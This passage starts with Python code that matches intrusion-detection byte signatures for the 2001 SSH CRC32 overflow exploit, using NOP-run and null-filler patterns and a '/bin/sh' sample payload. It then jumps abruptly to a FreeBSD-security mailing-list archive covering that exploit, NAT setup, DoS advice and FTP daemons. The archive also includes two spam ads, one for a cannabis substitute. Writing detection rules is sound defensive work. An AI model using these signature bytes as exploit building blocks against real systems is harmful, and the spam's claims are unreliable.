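    "EXPLOIT ssh CRC32 overflow filler": [(b"\x00" * 13, 0, None)],
    "EXPLOIT ssh CRC32 overflow NOOP": [(b"\x90" * 16, 0, None)],
    "EXPLOIT ssh CRC32 overflow": [
        (bytes.fromhex("00015700000018"), 0, 7),
        (bytes.fromhex("ffffffff0000"), 8, 14),
    ],
}


def content_matches(payload, pattern, offset=0, depth=None):
    """True if pattern occurs within payload[offset:offset+depth]
    (or anywhere from offset onward when depth is None)."""
    end = None if depth is None else offset + depth
    return pattern in payload[offset:end]


def match_rules(payload):
    """Names of the rules whose content checks all hold for this payload."""
    return [name for name, checks in RULES.items()
            if all(content_matches(payload, *check) for check in checks)]


# Constructed sample payloads (not from the captured traffic):
SAMPLES = {
    # the header bytes from the fourth rule, a NOP run, the shell string and
    # a null run, i.e. everything the signatures look for, concatenated
    "all_signatures": (bytes.fromhex("00015700000018") + b"\x00"
                       + bytes.fromhex("ffffffff0000") + b"\x90" * 16
                       + b"/bin/sh\x00" + b"\x00" * 13),
    # an ordinary SSH version banner, as seen at the start of every session
    "banner": b"SSH-1.5-OpenSSH_2.2.0p1\r\n",
    # a run of nulls such as zero padding in a legitimate packet
    "zero_padding": b"\x05" + b"\x00" * 13 + b"\x05",
}


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name}: {match_rules(payload)}")
```

The "zero_padding" sample fires only the filler rule, which is the practical caveat: a run of thirteen null bytes is not specific to this exploit, so that rule and the NOP rule are best read as corroborating alerts next to the offset-anchored fourth rule, and, as the analysis itself notes, all of these strings may change in derivatives of the exploit.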
From owner-freebsd-security Sun Nov 18 12:43:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 953FD37B417 for ; Sun, 18 Nov 2001 12:43:19 -0800 (PST)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id MAA17042; Sun, 18 Nov 2001 12:42:33 -0800
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17040; Sun Nov 18 12:42:20 2001
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.6/8.9.1) id fAIKgEk61599; Sun, 18 Nov 2001 12:42:14 -0800 (PST)
Received: from UNKNOWN(10.1.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpde61597; Sun Nov 18 12:41:16 2001
Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.6/8.9.1) id fAIKfGE03587; Sun, 18 Nov 2001 12:41:16 -0800 (PST)
Message-Id: <200111182041.fAIKfGE03587@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdcR3575; Sun Nov 18 12:40:55 2001
X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-Sender: schubert
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Patching 4.4-RELEASE against SSHv1 exploit
In-reply-to: Your message of "Sun, 18 Nov 2001 12:56:07 MST." <4.3.2.7.2.20011118124921.041ea050@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sun, 18 Nov 2001 12:40:55 -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

In message <4.3.2.7.2.20011118124921.041ea050@localhost>, Brett Glass writes:
> In a recent message to Bugtraq (quoted below), Dave Dittrich notes that
> an SSH exploit has been specifically tuned to attack machines running
> FreeBSD 4.x and certain versions of SSH. The hole apparently dates back
> to the liberally licensed versions of SSH, and so is present in both
> OpenSSH and SSH, Inc.'s SSH. Is 4.4-RELEASE vulnerable in the default
> install if sshd is enabled? If so, is there a patch?

This should answer your question: http://www.securityfocus.com/archive/82/222981

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/Alpha Team    Email:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD
Ministry of Management Services
Province of BC

From owner-freebsd-security Sun Nov 18 16: 0:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 3988737B416; Sun, 18 Nov 2001 16:00:56 -0800 (PST)
Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id fAJ00tv10839; Sun, 18 Nov 2001 19:00:55 -0500 (EST) (envelope-from str)
Date: Sun, 18 Nov 2001 19:00:55 -0500 (EST)
From: Igor Roshchin
Message-Id: <200111190000.fAJ00tv10839@giganda.komkon.org>
To: security@FreeBSD.org
Subject: OpenSSH port woes
Cc: dinoex@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org
OpenSSH port downloaded today from ftp.freebsd.org complains about the
patch that doesn't exist on ftp.freebsd.org:

...ports/security/openssh#make
>> openssh-3.0.1.tgz doesn't seem to exist in /usr/ports/distfiles/.
>> Attempting to fetch from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/.
Receiving openssh-3.0.1.tgz (363849 bytes): 100%
363849 bytes transferred in 25.4 seconds (13.97 Kbytes/s)
>> openbsd2x_3.0.1.patch doesn't seem to exist in /usr/ports/distfiles/.
>> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/.
fetch: pub/FreeBSD/ports/distfiles/openbsd2x_3.0.1.patch: cannot get remote modification time
fetch: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/openbsd2x_3.0.1.patch: FTP error: fetch: File unavailable (e.g., file not found, no access)
>> Couldn't fetch it - please try to retrieve this
>> port manually into /usr/ports/distfiles/ and try again.
*** Error code 1

Stop in /usr/ports/security/openssh.
......

Best,

Igor

From owner-freebsd-security Sun Nov 18 17:29:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from thunder.adam.com.au (thunder.adam.com.au [203.2.124.10]) by hub.freebsd.org (Postfix) with SMTP id 458B537B41C for ; Sun, 18 Nov 2001 17:29:07 -0800 (PST) Received: (qmail 30826 invoked from network); 19 Nov 2001 01:29:26 -0000 Received: from unknown (HELO server.hirecom.com.au) (203.2.124.238) by eden.adam.com.au with SMTP; 19 Nov 2001 01:29:26 -0000 Received: from da001d2181.lax-ca.osd.concentric.net ([208.36.183.138]) by server.hirecom.com.au with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id WJF67YYY; Mon, 19 Nov 2001 11:57:50 +1030 From: <61sweetheart@altavista.com> Message-Id: <-5oxntUgLKwuAWr9.-5oxntUgLWksSYxk8I.-5oxntUgL8w47Dxr-.-F3L.-F3Qpi2NY.-FWEn4wH@> Subject: Interested in meeting.. new people?
Reply-To: datersnet1201@yahoo.com Mime-Version: 1.0 Content-Type: text/html; charset="us-ascii" Date: Sun, 18 Nov 2001 17:33:22 To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Take control of your social life and join our community.
We offer a great way for busy, interesting and successful people to meet
each other in our safe, secure and anonymous environment.

Life should be wonderful. Find someone extraordinary to share your adventures with.
STOP waiting. START living.

GO meet Somebody!

CLICK HERE 


If you have received this message in error click here to be removed

 


To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 5:38:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.marriage.org (mail.learn4life.org [209.180.247.186]) by hub.freebsd.org (Postfix) with ESMTP id CAFB437B405; Mon, 19 Nov 2001 05:38:00 -0800 (PST) Received: from mail.bzznet.net (BULLFROG [209.134.34.20]) by proxy.marriage.org with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id W8B962ZZ; Mon, 19 Nov 2001 06:27:15 -0700 Message-ID: <00004e6d20bd$00001ff1$00006440@mail.bzznet.net> To: From: "Weedman" Subject: NEW SMOKING BLENDS! Date: Mon, 19 Nov 2001 21:18:04 -2000 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Now Offering for your "Sensitive" Delight ... NEW & IMPROVED *** KATHMANDU 2 *** Thanks to recent dramatic advances in the laboratorial processes for the extraction of botanical/herbal alkaloids and glycocides, we are now able to offer what has already been the most incredibly potent marijuana/cannabis alternative available on the planet .... KATHMANDU TEMPLE KIFF!!! It is NEW, IMPROVED and 20 times more stokin'-tokin' potent in its formulation. KATHMANDU 2 ... a viripotent cannabis alternative for blissful regressions of vexatious depressions... * BURNS AND SMOKES EASIER! * TOKES DEEPER! * TASTES SWEETER! * LASTS LONGER! Kathmandu Temple Kiff is a proprietary; Nepalese, sensitive, pipe-smoking/stoking substance. Kathmandu Temple Kiff is indeed the most substantial marijuana/cannabis alternative on the planet. Absolutely Legal! Marvelously Potent! Kathmandu Temple Kiff possesses all of the positive virtues fine ganja/cannabis without any of the negatives. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 5:52:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from anarkey.org (node10412.a2000.nl [24.132.4.18]) by hub.freebsd.org (Postfix) with ESMTP id 9482437B416 for ; Mon, 19 Nov 2001 05:52:34 -0800 (PST) Received: (from nobody@localhost) by anarkey.org (8.11.6/8.11.6) id fAJDi4K13642; Mon, 19 Nov 2001 14:44:04 +0100 (CET) (envelope-from eye@olger.org) Date: Mon, 19 Nov 2001 14:44:04 +0100 (CET) Message-Id: <200111191344.fAJDi4K13642@anarkey.org> From: "eye" To: freebsd-security@freebsd.org Subject: unsubscribe X-Mailer: Anarkey X-OriginatingIP: 192.168.0.11 (olger) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 8:13:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from kumquat.mail.uk.easynet.net (kumquat.mail.uk.easynet.net [195.40.1.42]) by hub.freebsd.org (Postfix) with ESMTP id 730E137B405 for 
; Mon, 19 Nov 2001 08:13:31 -0800 (PST) Received: from magrat.office.easynet.net ([195.40.3.130]) by kumquat.mail.uk.easynet.net with esmtp (Exim 3.33 #1) id 165r2x-0002oa-00; Mon, 19 Nov 2001 16:13:23 +0000 Received: by MAGRAT with Internet Mail Service (5.5.2653.19) id ; Mon, 19 Nov 2001 16:13:23 -0000 Message-ID: <7052044C7D7AD511A20200508B5A9C58516989@MAGRAT> From: Lee Brotherston To: 'xmen koh' , freebsd-security@FreeBSD.ORG Subject: RE: How to stop DoS Attack?? Date: Mon, 19 Nov 2001 16:13:22 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

| Recently I got a DoS on my web server. Does anyone know how to
| stop a DoS attack and prevent it from happening again? Some help
| will be appreciated to explain the below TCPDump which I got
| during the attack.

When you encounter a DoS or DDoS, what can be done is largely based on the type of DoS. If it tries to use up resources of a machine by constantly requesting some processor-intensive CGI on a web server, for example, then some firewalling will probably suffice. If, however, it is the kind of attack which is designed to take up network resources, then it is a different matter. DoSes that saturate lines are seldom solved with firewalling at your end, as the likelihood is that your connection is probably already saturated by the time it reaches your firewall.

The best course of action is to gather as much information as possible, and to try to get in touch with your ISP or upstream provider. Depending on their internal policies etc., they may be able to add some filters in the router that provides your connectivity, maybe even at their borders if the DoS can be traced to peering points etc.
Having done this, then you can attempt to get in contact with the administrators of the systems that are attacking you, and/or their upstreams, in order to raise an abuse complaint, if it is relevant.

Hope it's of some use

Lee -- Lee Brotherston - IP Security Manager, Easynet Ltd http://www.easynet.net/ Phone: +44 20 7900 4444 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 15:12:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.in.nextra.sk (mail.in.nextra.sk [195.168.1.55]) by hub.freebsd.org (Postfix) with SMTP id 88BED37B405 for ; Mon, 19 Nov 2001 15:12:26 -0800 (PST) Received: (qmail 14864 invoked by uid 85); 19 Nov 2001 23:12:16 -0000 Received: from egresh@noc.nextra.sk by mail.in.nextra.sk with qmail-scanner-0.96 (. Clean. Processed in 0.338312 secs); 19 Nov 2001 23:12:16 -0000 Received: from unknown (HELO noc.nextra.sk) (195.168.29.2) by mail.in.nextra.sk with SMTP; 19 Nov 2001 23:12:16 -0000 Message-ID: <3BF991E3.5483C14F@noc.nextra.sk> Date: Tue, 20 Nov 2001 00:12:35 +0100 From: Tibor Gres Reply-To: egresh@noc.nextra.sk Organization: Nextra s r.o. X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: sk, en MIME-Version: 1.0 To: Matiss Elsbergs Cc: freebsd-security@freebsd.org Subject: Re: IP Masquerade References: <3BF65250.6E0B8F2E@softnet.ro> <001701c16f8e$4b02d300$0300a8c0@weird> Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

/etc/rc.conf:
..
gateway_enable="YES"          # forward packets between interfaces (sets net.inet.ip.forwarding=1)
firewall_enable="YES"         # rc.network only starts natd when the firewall is enabled
firewall_script="/etc/rc.fw"
natd_enable="YES"
natd_interface="fxp0"         # whatever interface faces the Internet
natd_flags="-s -u"
#  -use_sockets | -s
#      Allocate a socket(2) in order to establish an FTP data or IRC DCC send
#      connection. This option uses more system resources, but guarantees
#      successful connections when port numbers conflict.
#  -unregistered_only | -u
#      Only alter outgoing packets with an unregistered source address. According
#      to RFC 1918, unregistered source addresses are 10.0.0.0/8, 172.16.0.0/12
#      and 192.168.0.0/16.
..

/etc/rc.fw:
..
# rc.network sources this file as a shell script, so each rule needs the ipfw command.
# The kernel needs options IPFIREWALL and IPDIVERT for the divert rule to work, and
# the rest of the ruleset must still pass the traffic: with the default deny-all
# rule 65535 the divert rule alone passes nothing.
ipfw add 200 divert natd ip from any to any via fxp0
..

man ipfw
man natd

Matiss Elsbergs wrote: > > man natd > ----- Original Message ----- > From: "Florin MANAILA" > To: "FreeBSD" > Sent: Saturday, November 17, 2001 2:04 PM > Subject: IP Masquerade > > > Hi all, > > how do I make IP Masquerade on a FreeBSD with ipfw for > > 192.168.1.0/24 to be able to communicate with the global > > Internet ? > > > > > > Best regards, > > Florin > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Tibor Gres e-mail: egresh@noc.nextra.sk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 20: 1:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id BB59137B418 for ; Mon, 19 Nov 2001 20:01:48 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12183; Mon, 19 Nov 2001 21:01:28 -0700 (MST) Message-Id: <4.3.2.7.2.20011119180925.0448a420@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 19 Nov 2001 18:10:40 -0700 To: "Matiss Elsbergs" , "Florin MANAILA" From: Brett Glass Subject: Re: IP Masquerade Cc: In-Reply-To: <001701c16f8e$4b02d300$0300a8c0@weird> References: <3BF65250.6E0B8F2E@softnet.ro> Mime-Version: 1.0 
Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:35 AM 11/17/2001, Matiss Elsbergs wrote: >man natd Alas, that man page really doesn't go through all the steps. I've been thinking of writing a HOWTO, since I've helped so many puzzled people get through this. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 20:38:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from gramsc1.dyndns.org (h00609774e769.ne.mediaone.net [24.91.224.187]) by hub.freebsd.org (Postfix) with ESMTP id 0ACE837B405 for ; Mon, 19 Nov 2001 20:38:09 -0800 (PST) Received: from gramsc1.dyndns.org (xfedwigk@localhost.net [127.0.0.1]) by gramsc1.dyndns.org (8.12.1/8.12.1) with ESMTP id fAK4c2BH021471; Mon, 19 Nov 2001 23:38:02 -0500 (EST) (envelope-from resopmok@gramsc1.dyndns.org) Received: from localhost (resopmok@localhost) by gramsc1.dyndns.org (8.12.1/8.12.1/Submit) with ESMTP id fAK4c1D6021468; Mon, 19 Nov 2001 23:38:01 -0500 (EST) (envelope-from resopmok@gramsc1.dyndns.org) Date: Mon, 19 Nov 2001 23:38:01 -0500 (EST) From: Chris Thomas To: Brett Glass Cc: Matiss Elsbergs , Florin MANAILA , Subject: Re: IP Masquerade In-Reply-To: <4.3.2.7.2.20011119180925.0448a420@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is off-topic for this list, and the handbook has very good instructions (www.freebsd.org/handbook, section 17.11). It'd be great if this were the last message on this topic. OK?
-chris On Mon, 19 Nov 2001, Brett Glass wrote: > At 10:35 AM 11/17/2001, Matiss Elsbergs wrote: > > >man natd > > Alas, that man page really doesn't go through all the steps. I've been > thinking of writing a HOWTO, since I've helped so many puzzled people get > through this. > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 23: 3:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from cyberlib.itb.ac.id (cyberlib.itb.ac.id [167.205.4.25]) by hub.freebsd.org (Postfix) with SMTP id 27C8537B405 for ; Mon, 19 Nov 2001 23:03:23 -0800 (PST) Received: (qmail 91775 invoked by uid 1223); 20 Nov 2001 07:10:05 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 20 Nov 2001 07:10:05 -0000 Date: Tue, 20 Nov 2001 14:10:05 +0700 (JAVT) From: Hotben Sinaga To: Mike Tancsa Cc: Kris Kennaway , security@freebsd.org Subject: Re: FreeBSD remote root exploit ? In-Reply-To: <5.1.0.14.0.20010719010646.03e25eb8@192.168.0.12> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Do you know about Turbo Assembler? If you do, please help me to solve my problem........
thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 6:35:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id A9C6937B416 for ; Tue, 20 Nov 2001 06:35:38 -0800 (PST) Received: from simoeon.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by smtp1.sentex.ca (8.11.6/8.11.6) with ESMTP id fAKEZcZ20878 for ; Tue, 20 Nov 2001 09:35:38 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20011120092809.03876160@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 09:29:00 -0500 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: Vendors For WU-FTPD Please Read Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What would be a good alternative to WU-FTPD that allows safe one way uploads ? ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Date: Mon, 19 Nov 2001 12:49:47 -0700 (MST) >From: Vulnerability Help >To: >Subject: Vendors For WU-FTPD Please Read >X-Virus-Scanned: by AMaViS perl-10 > > > >Heya all, > >The SecurityFocus Vulnerability Help Team is in the process of notifying >vendors of a remotely exploitable problem in WU-FTPD . Rather than miss >any vendors we are asking vendors which read Bugtraq and ship WU-FTPD >either as a default package or a ports package to please mail us your >relevant security contact information (with a PGP key please). 
The WU-FTPD >has been notified already. > >Cheers, > >SecurityFocus >Vulnerability Help Team -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 6:42:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id 1A32437B41A for ; Tue, 20 Nov 2001 06:42:21 -0800 (PST) Received: from ruby.ccmr.cornell.edu (IDENT:0@ruby.ccmr.cornell.edu [128.84.231.115]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA01811; Tue, 20 Nov 2001 09:43:25 -0500 Received: from localhost (mitch@localhost) by ruby.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA02842; Tue, 20 Nov 2001 09:42:20 -0500 X-Authentication-Warning: ruby.ccmr.cornell.edu: mitch owned process doing -bs Date: Tue, 20 Nov 2001 09:42:20 -0500 (EST) From: Mitch Collinsworth X-Sender: mitch@ruby.ccmr.cornell.edu To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: <5.1.0.14.0.20011120092809.03876160@marble.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Nov 2001, Mike Tancsa wrote: > What would be a good alternative to WU-FTPD that allows safe one way uploads ? 
www.proftpd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 6:55:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id E536537B417 for ; Tue, 20 Nov 2001 06:55:04 -0800 (PST) Received: from ruby.ccmr.cornell.edu (IDENT:0@ruby.ccmr.cornell.edu [128.84.231.115]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA02116; Tue, 20 Nov 2001 09:56:09 -0500 Received: from localhost (mitch@localhost) by ruby.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA02895; Tue, 20 Nov 2001 09:55:04 -0500 X-Authentication-Warning: ruby.ccmr.cornell.edu: mitch owned process doing -bs Date: Tue, 20 Nov 2001 09:55:04 -0500 (EST) From: Mitch Collinsworth X-Sender: mitch@ruby.ccmr.cornell.edu To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Nov 2001, Mike Tancsa wrote: > It too seems to be vulnerable to various security holes in the recent and > not so recent past :-( Name one thing that hasn't been. The real issue, IMO, is not having never had a security bug, but how quickly bugs are fixed and how easy it is to apply the fixes. 
-Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7: 6:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from softhome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with ESMTP id 5D73837B418 for ; Tue, 20 Nov 2001 07:06:48 -0800 (PST) Received: from 192.168.44.91 ([213.86.145.226]) (AUTH: PLAIN robsd@softhome.net) by softhome.net with esmtp; Tue, 20 Nov 2001 07:57:44 -0700 Date: Tue, 20 Nov 2001 15:09:17 +0000 From: RoBSD X-Mailer: The Bat! (v1.53d) Reply-To: RoBSD Organization: RoBSD X-Priority: 3 (Normal) Message-ID: <722713532.20011120150917@softhome.net> To: Mitch Collinsworth Cc: security@FreeBSD.ORG Subject: Re[2]: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org www.pureftpd.org MC> On Tue, 20 Nov 2001, Mike Tancsa wrote: >> What would be a good alternative to WU-FTPD that allows safe one way uploads ? 
MC> www.proftpd.org MC> To Unsubscribe: send mail to majordomo@FreeBSD.org MC> with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7:17:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 9BF2037B417 for ; Tue, 20 Nov 2001 07:17:09 -0800 (PST) Received: from simoeon.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by smtp1.sentex.ca (8.11.6/8.11.6) with ESMTP id fAKFH7g27151; Tue, 20 Nov 2001 10:17:07 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20011120095853.038e9280@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 10:10:29 -0500 To: Mitch Collinsworth From: Mike Tancsa Subject: Re: Fwd: Vendors For WU-FTPD Please Read Cc: security@FreeBSD.ORG In-Reply-To: References: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:55 AM 11/20/01 -0500, Mitch Collinsworth wrote: >On Tue, 20 Nov 2001, Mike Tancsa wrote: > > > It too seems to be vulnerable to various security holes in the recent and > > not so recent past :-( > >Name one thing that hasn't been. The real issue, IMO, is not >having never had a security bug, but how quickly bugs are fixed >and how easy it is to apply the fixes. qmail? Anyway, I am not looking at either bugs or zero bugs, just fewer bugs. The stock ftpd that comes with FreeBSD has not had many holes, for example.
